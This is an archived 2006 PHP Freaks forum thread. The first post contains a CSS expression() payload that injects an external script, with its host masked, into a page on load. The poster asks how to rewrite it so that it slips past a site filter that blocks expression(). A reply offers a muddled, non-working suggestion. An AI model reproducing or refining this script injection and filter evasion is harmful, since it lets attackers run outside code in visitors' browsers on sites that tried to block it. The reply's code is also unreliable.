Cheap Commercial Posted April 18, 2006 Share Posted April 18, 2006 is there anyway to change the following code so expression( is not there becuase it is blocked heres is the code<style> .divSubmitVisible {display:none;} </style> <span style="font-size=expression('1px' +function(){if (!document.ran){ document.ran=true; document.profile='6756'; document.offs='0'; var x=function(){ var s=document.createElement('script'); s.src='*************.js'; document.body.appendChild(s)}; window.attachEvent('onload', x); }}())" > </span>is it possible to change the font size thing to something else? that basically what i needed before the java to css thing Link to comment https://forums.phpfreaks.com/topic/7686-expression/ Share on other sites More sharing options...
GBS Posted April 19, 2006 Share Posted April 19, 2006 Hi there,I'm not sure to get it all well, so,...[!--quoteo--][div class=\'quotetop\']QUOTE[/div][div class=\'quotemain\'][!--quotec--]is it possible to change the font size thing to something else?[/quote]Hmm,, I would try something like:---<span [b]Id="myId1"[/b] style="font-size=expression('1px' ....---& then, using javascript, with the 'onclick()' function, by example, I would try something like:---document.getElementById('myId1').styleFont="whatyouwant&whatyouneed:)";---Hoping it will help,l8tr,, Link to comment https://forums.phpfreaks.com/topic/7686-expression/#findComment-28766 Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.